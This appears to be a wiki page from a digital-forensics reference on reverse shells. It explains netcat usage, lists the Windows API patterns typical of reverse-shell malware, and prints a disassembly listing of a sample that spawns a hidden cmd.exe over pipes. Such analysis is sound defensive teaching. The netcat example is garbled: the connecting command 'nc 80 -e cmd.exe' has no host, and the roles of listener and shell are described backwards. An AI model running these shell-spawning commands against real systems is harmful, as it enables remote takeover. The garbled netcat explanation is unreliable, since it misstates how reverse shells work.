From aldeid
Jump to navigation Jump to search
You are here
Reverse Shell

Reverse shell

A reverse shell is a shell initiated by the infected machine and that offers a remote access to the attacker. Netcat/Socat can be used for such purposes:

  • Infected machine: the below command opens a socket and waits for remote connections:
C:\> nc -l -p 80
  • Connection: the attacker connects to the infected machine:
C:\> nc 80 -e cmd.exe

Windows Reverse Shell

Malware can implement a Windows reverse shell by invoking the cmd.exe command with CreateProcess. The presence of CreateThread and CreatePipe could indicate a multithreaded Windows remote shell.


  • Call to CreateProcess and manipulation of the STARTUPINFO structure passed to the CreateProcess function.
  • Socket created and connection to remote server established
  • Socket tied to the standard streams (stdin, stdout, stderr) for cmd.exe
  • CreateProcess starts cmd.exe with window hidden


  • Creation of a socket + 2 pipes (CreatePipe) + 2 threads (CreateThread will create 1 thread for reading from stdin pipe, and 1 other for writing to stdout pipe)
  • CreatePipe used to tie red/write ends to a pipes
  • CreateProcess used to tie standard streams to pipes instead of directly to the sockets
Data transmitted to pipe is often encrypted.


.text:00401262                 mov     esi, ds:CreatePipe
.text:00401268                 lea     ecx, [esp+1ACh+PipeAttributes]
.text:0040126C                 push    ecx             ; lpPipeAttributes
.text:0040126D                 push    edx             ; hWritePipe
.text:0040126E                 push    ebx             ; hReadPipe
.text:0040126F                 call    esi ; CreatePipe
.text:00401271                 lea     ecx, [esp+1A8h+PipeAttributes]
.text:00401275                 lea     eax, [ebx+4]
.text:00401278                 push    ebp             ; nSize
.text:00401279                 push    ecx             ; lpPipeAttributes
.text:0040127A                 lea     edx, [esp+1B0h+hReadPipe]
.text:0040127E                 push    eax             ; hWritePipe
.text:0040127F                 push    edx             ; hReadPipe
.text:00401280                 call    esi ; CreatePipe
.text:00401282                 mov     [esp+1A8h+StartupInfo.cb], 44h
.text:0040128A                 mov     [esp+1A8h+StartupInfo.lpReserved], ebp
.text:0040128E                 mov     eax, [esp+1A8h+hWritePipe]
.text:00401292                 mov     [esp+1A8h+StartupInfo.lpTitle], ebp
.text:00401296                 mov     [esp+1A8h+StartupInfo.lpDesktop], ebp
.text:0040129A                 mov     [esp+1A8h+StartupInfo.dwYSize], ebp
.text:0040129E                 mov     [esp+1A8h+StartupInfo.dwXSize], ebp
.text:004012A2                 mov     [esp+1A8h+StartupInfo.dwY], ebp
.text:004012A6                 mov     [esp+1A8h+StartupInfo.dwX], ebp
.text:004012AA                 mov     [esp+1A8h+StartupInfo.wShowWindow], bp
.text:004012AF                 mov     [esp+1A8h+StartupInfo.lpReserved2], ebp
.text:004012B3                 mov     [esp+1A8h+StartupInfo.cbReserved2], bp
.text:004012B8                 mov     [esp+1A8h+StartupInfo.dwFlags], 101h
.text:004012C0                 mov     [esp+1A8h+StartupInfo.hStdError], eax
.text:004012C7                 mov     [esp+1A8h+StartupInfo.hStdOutput], eax
.text:004012CE                 mov     eax, [esp+1A8h+hReadPipe]
.text:004012D2                 mov     esi, ds:GetCurrentProcess
.text:004012D8                 push    ebp             ; dwOptions
.text:004012D9                 push    1               ; bInheritHandle
.text:004012DB                 lea     ecx, [esp+1B0h+StartupInfo.hStdError]
.text:004012E2                 push    2               ; dwDesiredAccess
.text:004012E4                 push    ecx             ; lpTargetHandle
.text:004012E5                 mov     [esp+1B8h+StartupInfo.hStdInput], eax
.text:004012EC                 call    esi ; GetCurrentProcess
.text:004012EE                 mov     edx, [esp+1B8h+hWritePipe]
.text:004012F2                 push    eax             ; hTargetProcessHandle
.text:004012F3                 push    edx             ; hSourceHandle
.text:004012F4                 call    esi ; GetCurrentProcess
.text:004012F6                 push    eax             ; hSourceProcessHandle
.text:004012F7                 call    ds:DuplicateHandle
.text:004012FD                 mov     edi, offset aCmd_exe ; "cmd.exe"
.text:00401302                 or      ecx, 0FFFFFFFFh
.text:00401305                 xor     eax, eax
.text:00401307                 lea     edx, [esp+1A8h+CommandLine]
.text:0040130E                 repne scasb
.text:00401310                 not     ecx
.text:00401312                 sub     edi, ecx
.text:00401314                 mov     eax, ecx
.text:00401316                 mov     esi, edi
.text:00401318                 mov     edi, edx
.text:0040131A                 lea     edx, [esp+1A8h+StartupInfo]
.text:0040131E                 shr     ecx, 2
.text:00401321                 rep movsd
.text:00401323                 mov     ecx, eax
.text:00401325                 lea     eax, [esp+1A8h+CommandLine]
.text:0040132C                 and     ecx, 3
.text:0040132F                 rep movsb
.text:00401331                 lea     ecx, [esp+1A8h+ProcessInformation]
.text:00401338                 push    ecx             ; lpProcessInformation
.text:00401339                 push    edx             ; lpStartupInfo
.text:0040133A                 push    ebp             ; lpCurrentDirectory
.text:0040133B                 push    ebp             ; lpEnvironment
.text:0040133C                 push    ebp             ; dwCreationFlags
.text:0040133D                 push    1               ; bInheritHandles
.text:0040133F                 push    ebp             ; lpThreadAttributes
.text:00401340                 push    ebp             ; lpProcessAttributes
.text:00401341                 push    eax             ; lpCommandLine
.text:00401342                 push    ebp             ; lpApplicationName
.text:00401343                 call    ds:CreateProcessA

Pages in category "Digital-Forensics/Backdoors/Reverse-Shell"

The following 5 pages are in this category, out of 5 total.